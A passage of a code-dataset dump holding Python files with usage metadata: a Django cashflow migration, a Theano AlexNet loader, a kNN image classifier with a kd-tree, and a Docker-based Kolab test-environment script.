"line_number": 93, "usage_type": "name"}, {"api_name": "os.environ.get", "line_number": 97, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 97, "usage_type": "attribute"}, {"api_name": "uuid.uuid4", "line_number": 108, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 110, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 117, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 125, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 126, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 127, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 164, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 128, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 128, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 171, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 171, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 185, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 172, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 172, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 172, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 195, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 195, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 196, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 197, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 223, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 200, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 200, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 200, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 200, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 200, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 231, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 231, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 257, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 232, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 232, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 232, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 271, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 271, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 272, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 276, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 274, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 274, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 274, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 274, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 274, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 282, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 282, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 283, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 284, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 287, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 287, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 287, 
"usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 287, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 287, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 297, "usage_type": "name"}, {"api_name": "requests.delete", "line_number": 310, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 334, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 340, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 344, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 345, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 346, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 384, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 347, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 347, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 347, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 347, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 407, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 409, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 416, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 416, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 420, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 420, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 421, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 421, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 421, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 421, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 421, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 430, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 431, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 433, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 442, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 445, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 470, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 472, "usage_type": "name"}]} +{"seq_id": "209033545", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('properties', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='cfModel',\n fields=[\n ('id', models.AutoField(primary_key=True, auto_created=True, verbose_name='ID', serialize=False)),\n ('name', models.CharField(max_length=50)),\n ('startDate', models.DateTimeField()),\n ('periods', models.PositiveIntegerField()),\n ('VisibleToPublic', models.BooleanField()),\n ('VisibleToCompany', models.BooleanField()),\n ],\n ),\n migrations.CreateModel(\n name='GrowthRate',\n fields=[\n ('id', models.AutoField(primary_key=True, auto_created=True, verbose_name='ID', serialize=False)),\n ('modelPeriod', models.IntegerField(null=True)),\n ('modelDate', models.DateTimeField()),\n ('iteration', models.PositiveIntegerField(null=True)),\n ('amount', models.DecimalField(max_digits=5, decimal_places=4)),\n ],\n options={\n 'abstract': False,\n },\n ),\n migrations.CreateModel(\n name='GrowthRateCategory',\n fields=[\n ('id', models.AutoField(primary_key=True, 
auto_created=True, verbose_name='ID', serialize=False)),\n ('name', models.CharField(max_length=50)),\n ('notes', models.TextField()),\n ],\n options={\n 'abstract': False,\n },\n ),\n migrations.AddField(\n model_name='growthrate',\n name='GrowthRateCategory',\n field=models.ForeignKey(to='cashflows.GrowthRateCategory'),\n ),\n migrations.AddField(\n model_name='cfmodel',\n name='GrowthRateCategories',\n field=models.ManyToManyField(to='cashflows.GrowthRateCategory'),\n ),\n migrations.AddField(\n model_name='cfmodel',\n name='building',\n field=models.ForeignKey(to='properties.segment'),\n ),\n ]\n", "sub_path": "cashflows/migrations/0001_initial.py", "file_name": "0001_initial.py", "file_ext": "py", "file_size_in_byte": 2283, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.AutoField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 18, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 19, "usage_type": "name"}, {"api_name": "django.db.models.PositiveIntegerField", "line_number": 20, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 20, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 21, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 21, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 22, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 22, "usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 25, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 25, "usage_type": "name"}, {"api_name": "django.db.models.AutoField", "line_number": 28, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 28, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 29, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 29, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 30, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 30, "usage_type": "name"}, {"api_name": "django.db.models.PositiveIntegerField", "line_number": 31, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 31, "usage_type": "name"}, {"api_name": "django.db.models.DecimalField", "line_number": 32, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 32, "usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 38, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 38, "usage_type": "name"}, {"api_name": "django.db.models.AutoField", "line_number": 41, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 41, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 42, 
"usage_type": "call"}, {"api_name": "django.db.models", "line_number": 42, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 43, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 43, "usage_type": "name"}, {"api_name": "django.db.migrations.AddField", "line_number": 49, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 49, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 52, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 52, "usage_type": "name"}, {"api_name": "django.db.migrations.AddField", "line_number": 54, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 54, "usage_type": "name"}, {"api_name": "django.db.models.ManyToManyField", "line_number": 57, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 57, "usage_type": "name"}, {"api_name": "django.db.migrations.AddField", "line_number": 59, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 59, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 62, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 62, "usage_type": "name"}]} +{"seq_id": "244625464", "text": "import sys, os\nimport numpy\nimport numpy as np\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nimport theano\nimport theano.tensor as T\nfrom theano.tensor.signal import downsample\nfrom theano.tensor.signal import pool\nfrom theano.tensor.nnet import conv2d\n\n\nclass ConvLayer(object):\n \"\"\" Layer of a convolution \"\"\"\n\n def __init__(self, input, filter_shape, image_shape, f_params_w, f_params_b, subsample=(1,1), bmode =0,\n params_path = 'parameters_releasing'):\n \"\"\"\n\n :type input: theano.tensor.dtensor4\n :param input: symbolic image tensor, of shape image_shape\n\n :type filter_shape: tuple or list of length 4\n :param filter_shape: (number of filters, num input feature maps,\n filter height, filter width)\n\n :type image_shape: tuple or list of length 4\n :param image_shape: (batch size, num input feature maps,\n image height, image width)\n\n \n \"\"\"\n \n assert image_shape[1] == filter_shape[1]\n self.input = input\n \n assgn_w=np.transpose(np.load(os.path.join(params_path,f_params_w)),(3,0,1,2))\n \n self.W = theano.shared(\n np.asarray(\n assgn_w,\n dtype=theano.config.floatX\n ),\n borrow=True\n )\n\n # the bias is a 1D tensor -- one bias per output feature map\n assgn_b= np.load(os.path.join(params_path,f_params_b))\n #print (assgn_b.shape)\n self.b = theano.shared(\n np.asarray(\n assgn_b,\n dtype=theano.config.floatX\n ),\n borrow=True\n )\n\n # convolve input feature maps with filters\n\n conv_out = conv2d(\n input=input,\n filters=self.W,\n filter_shape=filter_shape,\n input_shape=image_shape,\n subsample=subsample,\n border_mode=bmode,\n filter_flip=True\n )\n\n self.output = T.nnet.relu(conv_out + self.b.dimshuffle('x', 0, 'x', 'x'))\n \n\n\n # store parameters of this layer\n self.params = [self.W, self.b]\n\n # keep track of model input\n self.input = input\n\n### Weights were downloaded from: https://dataverse.scholarsportal.info/dataset.xhtml?persistentId=hdl:10864/10911\n\n\nclass alexNet():\n def __init__(self,params_path = 'parameters_releasing',batch_size=1, learning_rate=0.1,\n weights=None,bias=None,image_size=(1,3,227,227)):\n \n\n n,d,w,h=image_size\n\n x = T.matrix('x') # the data is presented as rasterized images\n\n\n \n\n\n\n \n self.layer0_input = 
x.reshape((batch_size, 3, 227, 227))\n \n self.layer0 = ConvLayer(\n input=self.layer0_input,\n image_shape=(batch_size, 3, 227, 227),\n filter_shape=(96, 3, 11, 11),\n f_params_w='W_0_65.npy',\n f_params_b='b_0_65.npy',\n subsample=(4,4),\n bmode=0,\n params_path = params_path\n )\n \n\n \n self.pool0=pool.pool_2d(\n input=self.layer0.output,\n ds=(3,3),\n ignore_border=True,\n st=(2,2)\n )\n \n \n self.layer1_0 = ConvLayer(\n input=self.pool0[:,:96/2,:,:],\n image_shape=(batch_size, 96/2, 27, 27),\n filter_shape=tuple(np.asarray([256/2, 96/2, 5, 5])),\n f_params_w='W0_1_65.npy',\n f_params_b='b0_1_65.npy',\n subsample=(1,1),\n bmode=2,\n params_path = params_path\n )\n \n self.layer1_1 = ConvLayer(\n input=self.pool0[:,96/2:,:,:],\n image_shape=(batch_size, 96/2, 27, 27),\n filter_shape=tuple(np.asarray([256/2, 96/2, 5, 5])),\n f_params_w='W1_1_65.npy',\n f_params_b='b1_1_65.npy',\n subsample=(1,1),\n bmode=2,\n params_path = params_path\n )\n \n self.layer1_output= T.concatenate([self.layer1_0.output, self.layer1_1.output], axis=1)\n \n self.pool1=pool.pool_2d(\n input=self.layer1_output,\n ds=(3,3),\n ignore_border=True,\n st=(2,2)\n )\n \n \n self.layer2 = ConvLayer(\n input=self.pool1,\n image_shape=(batch_size, 256, 13, 13),\n filter_shape=(384, 256, 3, 3),\n f_params_w='W_2_65.npy',\n f_params_b='b_2_65.npy',\n subsample=(1,1),\n bmode=1,\n params_path = params_path\n )\n \n \n self.layer3_0 = ConvLayer(\n input=self.layer2.output[:,:384/2,:,:],\n image_shape=(batch_size, 384/2, 13, 13),\n filter_shape=tuple(np.asarray([384/2, 384/2, 3, 3])),\n f_params_w='W0_3_65.npy',\n f_params_b='b0_3_65.npy',\n subsample=(1,1),\n bmode=1,\n params_path = params_path\n )\n \n self.layer3_1 = ConvLayer(\n input=self.layer2.output[:,384/2:,:,:],\n image_shape=(batch_size, 384/2, 13, 13),\n filter_shape=tuple(np.asarray([384/2, 384/2, 3, 3])),\n f_params_w='W1_3_65.npy',\n f_params_b='b1_3_65.npy',\n subsample=(1,1),\n bmode=1,\n params_path = params_path\n )\n \n self.layer3_output= T.concatenate([self.layer3_0.output, self.layer3_1.output], axis=1)\n \n self.layer4_0 = ConvLayer(\n input=self.layer3_output[:,:384/2,:,:],\n image_shape=(batch_size, 384/2, 13, 13),\n filter_shape=tuple(np.asarray([256/2, 384/2, 3, 3])),\n f_params_w='W0_4_65.npy',\n f_params_b='b0_4_65.npy',\n subsample=(1,1),\n bmode=1,\n params_path = params_path\n )\n \n self.layer4_1 = ConvLayer(\n input=self.layer3_output[:,384/2:,:,:],\n image_shape=(batch_size, 384/2, 13, 13),\n filter_shape=tuple(np.asarray([256/2, 384/2, 5, 5])),\n f_params_w='W1_4_65.npy',\n f_params_b='b1_4_65.npy',\n subsample=(1,1),\n bmode=1,\n params_path = params_path\n )\n \n self.layer4_output= T.concatenate([self.layer4_0.output, self.layer4_1.output], axis=1)\n \n self.pool4=pool.pool_2d(\n input=self.layer4_output,\n ds=(3,3),\n ignore_border=True,\n st=(2,2),\n )\n\n self.x = x\n print (\"Alexnet built\")\n\n \n \n\n", "sub_path": "alexnet.py", "file_name": "alexnet.py", "file_ext": "py", "file_size_in_byte": 6638, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "matplotlib.use", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "theano.shared", "line_number": 42, "usage_type": 
"call"}, {"api_name": "numpy.asarray", "line_number": 43, "usage_type": "call"}, {"api_name": "theano.config", "line_number": 45, "usage_type": "attribute"}, {"api_name": "numpy.load", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "theano.shared", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 54, "usage_type": "call"}, {"api_name": "theano.config", "line_number": 56, "usage_type": "attribute"}, {"api_name": "theano.tensor.nnet.conv2d", "line_number": 63, "usage_type": "call"}, {"api_name": "theano.tensor.nnet.relu", "line_number": 73, "usage_type": "call"}, {"api_name": "theano.tensor.nnet", "line_number": 73, "usage_type": "attribute"}, {"api_name": "theano.tensor", "line_number": 73, "usage_type": "name"}, {"api_name": "theano.tensor.matrix", "line_number": 93, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 93, "usage_type": "name"}, {"api_name": "theano.tensor.signal.pool.pool_2d", "line_number": 116, "usage_type": "call"}, {"api_name": "theano.tensor.signal.pool", "line_number": 116, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 138, "usage_type": "call"}, {"api_name": "theano.tensor.concatenate", "line_number": 146, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 146, "usage_type": "name"}, {"api_name": "theano.tensor.signal.pool.pool_2d", "line_number": 148, "usage_type": "call"}, {"api_name": "theano.tensor.signal.pool", "line_number": 148, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 171, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 182, "usage_type": "call"}, {"api_name": "theano.tensor.concatenate", "line_number": 190, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 190, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 195, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 206, "usage_type": "call"}, {"api_name": "theano.tensor.concatenate", "line_number": 214, "usage_type": "call"}, {"api_name": "theano.tensor", "line_number": 214, "usage_type": "name"}, {"api_name": "theano.tensor.signal.pool.pool_2d", "line_number": 216, "usage_type": "call"}, {"api_name": "theano.tensor.signal.pool", "line_number": 216, "usage_type": "name"}]} +{"seq_id": "347532955", "text": "from collections import defaultdict\nfrom numpy import *\nimport heapq\nimport h5py\nimport pca_evaluation\nimport confusion_matrix\n\"\"\"KNN classifier implemented by brute-force and kd-tree\n\nThis module implement a KNN classifier\n\n\"\"\"\n\n\nclass TreeNode(object):\n def __init__(self, coordinates,label):\n self.coordinates = coordinates\n self.label = label\n\n def set_label(self,label):\n self.label = label\n\n\nclass kNN(object):\n\n def __init__(self, k, algorithm='brute-force'):\n \"\"\"initialize a k-nearest neighbor classifier.\n\n Args:\n dataset(list): a list of pair (arr,label), while arr is n components\n of dataset and label is the category.\n k(int): the number of nearest neighbour\n algorithm(str): brute-force / k_dtree\n \"\"\"\n\n self.train_set = []\n self.kd_tree = []\n self.k = k\n self.algorithm = algorithm\n self.dim = 0\n\n\n def manhattan_distance(self,A,B):\n \"\"\" manhattan distance\n\n Args:\n A(numpy.array) : img1\n B(numpy.array) : img2\n\n Returns manhattan 
distance of two images\n \"\"\"\n\n dist = sum(absolute(A-B), axis=0)\n return dist\n\n def make_kd_tree(self, train_nodes, dim, index=0):\n \"\"\" construct_kd_tree\n\n Args:\n train_nodes(list): a list of TreeNode objects built from the training images\n dim(int): dimension of the point (75 in this case)\n index(int): axis used to split at the current depth\n\n Returns the root of the constructed kd-tree\n \"\"\"\n # base case: an empty slice produces an empty subtree\n if not train_nodes:\n return None\n\n # Select axis based on depth so that axis cycles through all valid values\n train_nodes.sort(key=lambda x: x.coordinates[index]) # sort nodes along the current axis\n index = (index + 1) % dim\n # choose median as pivot element\n _median = len(train_nodes) >> 1\n\n # Create node and construct subtree recursively\n return (\n self.make_kd_tree(train_nodes[: _median], dim, index),\n self.make_kd_tree(train_nodes[_median + 1:], dim, index), train_nodes[_median])\n\n def get_knn_kdtree(self, kd_node, point, return_distances=True, i=0, heap=None):\n \"\"\" search the kd-tree for the k nearest neighbours\n\n Args:\n kd_node(tuple): a (left, right, TreeNode) triple as built by make_kd_tree\n point(numpy.array): an array representing the test image\n i(int): axis used at the current depth\n heap(list): bounded max-heap used internally during the recursion\n\n Returns a list of (distance, label) pairs for the k nearest neighbours\n \"\"\"\n\n is_root = not heap\n if is_root:\n heap = [] # construct a bounded priority queue.\n if kd_node:\n node = kd_node[2]\n dist = self.manhattan_distance(point, node.coordinates)\n dx = node.coordinates[i] - point[i]\n if len(heap) < self.k:\n heapq.heappush(heap, (-dist, node.label))\n elif dist < -heap[0][0]:\n heapq.heappushpop(heap, (-dist, node.label))\n i = (i + 1) % self.dim\n # Goes into the near branch, and then the far branch if needed\n self.get_knn_kdtree(kd_node[dx < 0], point, return_distances, i, heap)\n # abs(dx), not dx * dx, is the correct bound for the manhattan metric;\n # -heap[0][0] is the largest distance currently in the heap\n if len(heap) < self.k or abs(dx) < -heap[0][0]:\n self.get_knn_kdtree(kd_node[dx >= 0], point, return_distances, i, heap)\n if is_root:\n neighbors = sorted((-h[0], h[1]) for h in heap)\n return neighbors if return_distances else [n[1] for n in neighbors]\n\n def get_prediction(self, neighbours):\n \"\"\" get the majority of votes in k nearest neighbours\n\n Args:\n neighbours(list) : a list of category of K nearest neighbours\n\n Returns:\n majority of category of nearest neighbours\n \"\"\"\n counter = defaultdict(int)\n for votes in neighbours:\n counter[votes] += 1 # collect votes of each neighbour\n\n majority = max(counter.values()) # get the majority votes\n # find the category of the majority votes\n for k, v in counter.items():\n if v == majority:\n return k\n\n def classify(self, point):\n \"\"\" get the majority of votes in k nearest neighbours\n\n Args:\n point(numpy.array) : an array represents test image\n\n Returns:\n prediction of category of a image\n \"\"\"\n if self.algorithm == 'k_dtree':\n # each returned entry is a (distance, label) pair; vote on the labels\n neighbours = self.get_knn_kdtree(self.kd_tree, point, return_distances=True, i=0, heap=None)\n return self.get_prediction([label for _, label in neighbours])\n\n else:\n temp_imgs = self.train_set[:] # a temp array to store potential image\n k_nearest_neighbors = []\n while len(k_nearest_neighbors) < self.k:\n # construct a distance matrix through brute-force\n distance_matrix = [self.manhattan_distance(x[0], point) for x in temp_imgs]\n # Find the nearest neighbor.\n best_distance = min(distance_matrix)\n index = distance_matrix.index(best_distance)\n k_nearest_neighbors.append(temp_imgs[index])\n\n # Remove the nearest neighbour from the temp image list.\n del temp_imgs[index]\n\n # get prediction through voting.\n prediction = self.get_prediction([value[1] for value in 
k_nearest_neighbors])\n return prediction\n\n def fit(self, redMat, label):\n \"\"\" fit the labels and training data to the KNN classifier\n\n Args:\n redMat(numpy.array): training set\n label(numpy.array): labels\n \"\"\"\n if self.algorithm == 'brute-force':\n for i in range(len(redMat)):\n self.train_set.append((redMat[i, :], label[i]))\n elif self.algorithm == 'k_dtree':\n train_set_node = []\n self.dim = redMat.shape[1]\n for i in range(len(redMat)):\n tn = TreeNode(redMat[i, :],label[i]) # construct a tree node\n train_set_node.append(tn) # fit tree node to knn classifier\n self.kd_tree = self.make_kd_tree(train_set_node, self.dim)\n else:\n print('invalid arguments.')\n\n\ndef main():\n pred_array = []\n with h5py.File('./data/images_training.h5', 'r') as H:\n data = copy(H['data'])\n with h5py.File('./data/labels_training.h5', 'r') as H:\n label = copy(H['label'])\n with h5py.File('./data/images_testing.h5', 'r') as H:\n test = copy(H['data'])\n with h5py.File('./data/labels_testing_2000.h5', 'r') as H:\n test_label = copy(H['label'])\n train_X = data.reshape(30000, 784)\n test_X = test.reshape(5000, 784)\n test_X = test_X[:2000]\n redMatTest = pca_evaluation.transform(test_X)\n redMat = pca_evaluation.transform(train_X)\n classifier = kNN(5,'brute-force')\n classifier.fit(redMat, label)\n count = 0\n mycount = 0\n for i in range(len(redMatTest)):\n pred = classifier.classify(redMatTest[i]) # classify once and reuse the result\n if pred == test_label[i]:\n print('yes', test_label[i],' mycount: ', mycount)\n count += 1\n else:\n print('no')\n mycount += 1\n pred_array.append(pred)\n print(count)\n confusion_matrix.confusion_matrix_fashion(test_label, pred_array)\n\n\nmain()\n", "sub_path": "knn_naive.py", "file_name": "knn_naive.py", "file_ext": "py", "file_size_in_byte": 7588, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "heapq.heappush", "line_number": 95, "usage_type": "call"}, {"api_name": "heapq.heappushpop", "line_number": 97, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 116, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 185, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 187, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 189, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 191, "usage_type": "call"}, {"api_name": "pca_evaluation.transform", "line_number": 196, "usage_type": "call"}, {"api_name": "pca_evaluation.transform", "line_number": 197, "usage_type": "call"}, {"api_name": "confusion_matrix.confusion_matrix_fashion", "line_number": 213, "usage_type": "call"}]} +{"seq_id": "372863949", "text": "#!/usr/bin/env python2\nimport sh\nimport subprocess\nimport sys\nimport kolab\nfrom kolab import build\nimport kolabpopulated\nfrom kolabpopulated import build\nfrom kolabpopulated import run\nimport kontact\nfrom kontact import build\nfrom kontact import run\n\nimport settings\nimport dockerutils\n\ndef buildImage(repo, tag, rebuild, builder):\n image = dockerutils.findImage(repo, tag)\n if not image or rebuild:\n print(\"building image: \" + repo + \":\" + tag)\n builder()\n image = dockerutils.findImage(repo, tag)\n print(\"Image is ready: {}:{}\".format(repo, tag))\n return image\n\ndef startContainer(name, runner):\n container = dockerutils.findContainer(name)\n if not container:\n runner()\n container = dockerutils.findContainer(name)\n print(\"Container is 
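The knn_naive.py record above relies on a bounded priority queue for its neighbour search: heapq is a min-heap, so distances are pushed negated, which keeps the current worst kept candidate at heap[0]. A minimal, self-contained sketch of that trick (illustrative names, not the record's exact code):

import heapq

def k_nearest(points, query, k):
    # Brute-force k-NN with a bounded heap of size k: O(n log k).
    heap = []  # entries are (-distance, point); heap[0] holds the worst kept candidate
    for p in points:
        dist = sum(abs(a - b) for a, b in zip(p, query))  # Manhattan distance
        if len(heap) < k:
            heapq.heappush(heap, (-dist, p))
        elif dist < -heap[0][0]:  # closer than the current worst candidate
            heapq.heappushpop(heap, (-dist, p))
    return sorted((-d, p) for d, p in heap)  # (distance, point), nearest first

print(k_nearest([(0, 0), (3, 4), (1, 1), (5, 5)], (1, 2), k=2))  # [(1, (1, 1)), (3, (0, 0))]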
ready: {} {}\".format(name, container))\n return container\n\ndef main(command, argv):\n if command == \"build\":\n target = argv[2]\n if target == \"server\":\n dataset = argv[3]\n baseimage = buildImage(settings.REPOSITORY, \"base\", False, lambda: kolab.build.main)\n populatedbuild = buildImage(settings.REPOSITORY, settings.populatedTag(dataset), False, lambda: kolabpopulated.build.main(dataset))\n if target == \"client\":\n buildImage(\"kontact\", \"john\", False, lambda: kontact.build.main(\"john\"))\n if command == \"start\":\n print(\"start\")\n dataset = argv[2]\n clientconfigset = argv[3]\n container = startContainer(\"{}:{}\".format(settings.REPOSITORY, settings.populatedTag(dataset)), lambda: kolabpopulated.run.main(dataset))\n kontact.run.main(container, clientconfigset)\n sh.docker.kill(container)\n sh.docker.rm(container)\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1], sys.argv)\n\n# * build $env\n# ** build server with defined dataset\n# ** build client(s)\n\n# * start $env\n# ** start server\n# ** start client(s) with link to server\n\n\n\n", "sub_path": "testenv.py", "file_name": "testenv.py", "file_ext": "py", "file_size_in_byte": 1938, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "dockerutils.findImage", "line_number": 18, "usage_type": "call"}, {"api_name": "dockerutils.findImage", "line_number": 22, "usage_type": "call"}, {"api_name": "dockerutils.findContainer", "line_number": 27, "usage_type": "call"}, {"api_name": "dockerutils.findContainer", "line_number": 30, "usage_type": "call"}, {"api_name": "settings.REPOSITORY", "line_number": 39, "usage_type": "attribute"}, {"api_name": "kolab.build", "line_number": 39, "usage_type": "attribute"}, {"api_name": "settings.REPOSITORY", "line_number": 40, "usage_type": "attribute"}, {"api_name": "settings.populatedTag", "line_number": 40, "usage_type": "call"}, {"api_name": "kolabpopulated.build.main", "line_number": 40, "usage_type": "call"}, {"api_name": "kolabpopulated.build", "line_number": 40, "usage_type": "attribute"}, {"api_name": "kontact.build.main", "line_number": 42, "usage_type": "call"}, {"api_name": "kontact.build", "line_number": 42, "usage_type": "attribute"}, {"api_name": "settings.REPOSITORY", "line_number": 47, "usage_type": "attribute"}, {"api_name": "settings.populatedTag", "line_number": 47, "usage_type": "call"}, {"api_name": "kolabpopulated.run.main", "line_number": 47, "usage_type": "call"}, {"api_name": "kolabpopulated.run", "line_number": 47, "usage_type": "attribute"}, {"api_name": "kontact.run.main", "line_number": 48, "usage_type": "call"}, {"api_name": "kontact.run", "line_number": 48, "usage_type": "attribute"}, {"api_name": "sh.docker.kill", "line_number": 49, "usage_type": "call"}, {"api_name": 